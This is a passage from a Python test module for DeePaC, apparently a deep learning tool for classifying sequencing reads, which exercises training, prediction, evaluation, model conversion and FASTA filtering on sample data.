self.__config_train(paprconfig, epoch_start, epoch_end).train()
runname = paprconfig.runname
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"training-{}.csv".format(runname)))), "Training failed."
if self.input_modes_dict["tfdata"]:
print("TEST: Training (sensitive - tfrecord)...")
paprconfig = self.bloader.get_sensitive_training_config()
paprconfig.use_tf_data = True
self.__config_train(paprconfig, epoch_start, epoch_end).train()
runname = paprconfig.runname
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"training-{}.csv".format(runname)))), "Training failed."
def __config_train(self, paprconfig, epoch_start=0, epoch_end=2):
"""Set sample data paths and compile."""
if paprconfig.use_tf_data and tf.executing_eagerly():
paprconfig.x_train_path = os.path.join("deepac-tests", "sample_train_data")
paprconfig.y_train_path = os.path.join("deepac-tests", "sample_train_labels")
paprconfig.x_val_path = os.path.join("deepac-tests", "sample_val_data")
paprconfig.y_val_path = os.path.join("deepac-tests", "sample_val_labels")
else:
paprconfig.x_train_path = os.path.join("deepac-tests", "sample_train_data.npy")
paprconfig.y_train_path = os.path.join("deepac-tests", "sample_train_labels.npy")
paprconfig.x_val_path = os.path.join("deepac-tests", "sample_val_data.npy")
paprconfig.y_val_path = os.path.join("deepac-tests", "sample_val_labels.npy")
paprconfig.epoch_start = epoch_start
paprconfig.epoch_end = epoch_end
paprconfig.log_superpath = "deepac-tests"
paprconfig.log_dir = paprconfig.log_superpath + "/{runname}-logs".format(runname=paprconfig.runname)
paprconfig.set_tpu_resolver(self.tpu_resolver)
paprnet = RCNet(paprconfig)
paprnet.load_data()
paprnet.compile_model()
return paprnet
def test_pred(self, quick=False):
"""Test predicting."""
print("TEST: Predicting (custom)...")
model = tf.keras.models.load_model(os.path.join("deepac-tests", "deepac-test-logs", "deepac-test-e002.h5"))
compare_rc(model, os.path.join("deepac-tests", "sample_val_data.npy"),
os.path.join("deepac-tests", "deepac-test-logs", "deepac-test-e002-predictions-sample_val.npy"),
replicates=1)
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002-predictions-sample_val.npy"))), "Prediction failed."
if not quick:
print("TEST: Predicting (rapid)...")
paprconfig = self.bloader.get_rapid_training_config()
runname = paprconfig.runname
model = self.bloader.load_rapid_model(log_path="deepac-tests", tpu_resolver=self.tpu_resolver)
compare_rc(model, os.path.join("deepac-tests", "sample_val_data.npy"),
os.path.join("deepac-tests", "{}-logs".format(runname), "val-pred-rapid.npy"))
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"val-pred-rapid.npy"))), "Prediction failed."
print("TEST: Predicting (sensitive)...")
paprconfig = self.bloader.get_sensitive_training_config()
runname = paprconfig.runname
model = self.bloader.load_sensitive_model(log_path="deepac-tests", tpu_resolver=self.tpu_resolver)
compare_rc(model, os.path.join("deepac-tests", "sample_val_data.npy"),
os.path.join("deepac-tests", "{}-logs".format(runname), "val-pred-sensitive.npy"))
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"val-pred-sensitive.npy"))), "Prediction failed."
def test_eval(self):
"""Test evaluating."""
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "tests", "configs", "eval-test.ini"))
evaluate_reads(config)
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-metrics.csv"))), "Evaluation failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test_2_sample_val_auc.png"))), "Evaluation failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test_2_sample_val_aupr.png"))), "Evaluation failed."
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "tests", "configs", "eval_ens-test.ini"))
evaluate_ensemble(config)
assert (os.path.isfile(os.path.join("deepac-tests",
"ens01-metrics.csv"))), "Evaluation failed."
assert (os.path.isfile(os.path.join("deepac-tests",
"ens01_sample_val_auc.png"))), "Evaluation failed."
assert (os.path.isfile(os.path.join("deepac-tests",
"ens01_sample_val_aupr.png"))), "Evaluation failed."
def test_convert(self):
"""Test converting."""
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "tests", "configs", self.test_config))
config['Devices']['DistStrategy'] = "OneDeviceStrategy"
config['Devices']['Device_build'] = "CPU:0"
convert_cudnn(config, os.path.join("deepac-tests", "deepac-test-logs", "deepac-test-e002.h5"), False)
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002_converted.h5"))), "Conversion failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002_weights.h5"))), "Conversion failed."
config['Architecture']['MC_Dropout'] = 'True'
convert_cudnn(config, os.path.join("deepac-tests", "deepac-test-logs", "deepac-test-e002_converted.h5"), False)
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002_converted_converted.h5"))), "Conversion failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002_converted_weights.h5"))), "Conversion failed."
def test_filter(self):
"""Test filtering."""
model = tf.keras.models.load_model(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002_converted_converted.h5"))
predict_fasta(model, os.path.join("deepac-tests", "sample-test.fasta"),
os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002-predictions-sample_test.npy"),
replicates=5)
filter_fasta(os.path.join("deepac-tests", "sample-test.fasta"),
os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002-predictions-sample_test.npy"),
os.path.join("deepac-tests", "sample-test-filtered-pos.fasta"),
print_potentials=True,
output_neg=os.path.join("deepac-tests", "sample-test-filtered-neg.fasta"),
confidence_thresh=0.65,
output_undef=os.path.join("deepac-tests", "sample-test-filtered-undef.fasta"),
pred_uncertainty=os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002-predictions-sample_test-std.npy"))
assert (os.path.isfile(os.path.join("deepac-tests", "sample-test-filtered-pos.fasta"))), "Filtering failed."
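# Typical quick self-test run (argument values are illustrative, not defaults):
#   Tester(n_cpus=4, do_quick=True, scale=1).run_tests()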
|